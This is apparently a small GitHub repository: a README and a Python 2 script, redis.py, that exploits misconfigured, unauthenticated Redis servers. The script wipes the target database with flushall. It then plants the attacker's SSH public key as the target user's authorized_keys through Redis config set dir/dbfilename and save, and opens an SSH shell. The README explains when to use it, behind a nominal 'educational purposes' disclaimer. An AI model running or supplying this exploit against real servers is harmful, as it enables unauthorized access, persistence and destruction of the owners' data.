├── README.md └── redis.py /README.md: -------------------------------------------------------------------------------- 1 | # Redis-Server-Exploit 2 | This will give you shell access on the target system if redis server is not configured properly and faced on the internet without any authentication 3 | 4 | # Disclaimer 5 | This exploit is purely intended for educational purposes. I do not want anyone to use this exploit to actually hack into computers or do other illegal things. So I cannot be held responsible for any illegal purposes. If you don’t agree, then you are not allowed to use/run/see the exploit… so leave it immediately.. 6 | 7 | # Pre-Requesties 8 | 1. A valid Username of the target system 9 | 10 | # Things to keep in mind 11 | 1. This script is created by treating default port of SSH 22/TCP 12 | 2. This script is created by treating default port of REDIS Server 6379/TCP 13 | 3. IP address of the target system and User of the target system served to script as arguments 14 | 4. Script is created using libraries like termcolored..So, install these libraries before running. 15 | 16 | #When you require to use this ? 17 | When you got something like this: 18 | Nmap scan report for (127.0.0.1) 19 | Host is up (0.27s latency). 20 | PORT STATE SERVICE VERSION 21 | 6379/tcp open redis Redis key-value store 22 | -------------------------------------------------------------------------------- /redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #Author : Avinash Kumar Thapa aka -Acid 3 | #Twitter : https://twitter.com/m_avinash143 4 | ##################################################################################################################################################### 5 | 6 | import os 7 | import os.path 8 | from sys import argv 9 | from termcolor import colored 10 | 11 | 12 | script, ip_address, username = argv 13 | 14 | 15 | PATH='/usr/bin/redis-cli' 16 | PATH1='/usr/local/bin/redis-cli' 17 | 18 | def ssh_connection(): 19 | shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address 20 | os.system(shell) 21 | 22 | if os.path.isfile(PATH) or os.path.isfile(PATH1): 23 | try: 24 | print colored('\t*******************************************************************', "green") 25 | print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green") 26 | print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green") 27 | print colored('\t*******************************************************************', "green") 28 | print "\n" 29 | print colored("\t SSH Keys Need to be Generated", 'blue') 30 | os.system('ssh-keygen -t rsa -C \"acid_creative\"') 31 | print colored("\t Keys Generated Successfully", "blue") 32 | os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt") 33 | cmd = "redis-cli -h " + ip_address + ' flushall' 34 | cmd1 = "redis-cli -h " + ip_address 35 | os.system(cmd) 36 | cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist' 37 | os.system(cmd2) 38 | cmd3 = cmd1 + ' config set dbfilename "backup.db" ' 39 | cmd4 = cmd1 + ' config set dir' + " /home/"+username+"/.ssh/" 40 | cmd5 = cmd1 + ' config set dbfilename "authorized_keys" ' 41 | cmd6 = cmd1 + ' save' 42 | os.system(cmd3) 43 | os.system(cmd4) 44 | os.system(cmd5) 45 | os.system(cmd6) 46 | print colored("\tYou'll get shell in sometime..Thanks for your patience", "green") 47 | ssh_connection() 48 | 49 | except: 50 | print "Something went wrong" 51 | else: 52 | print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red") 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | --------------------------------------------------------------------------------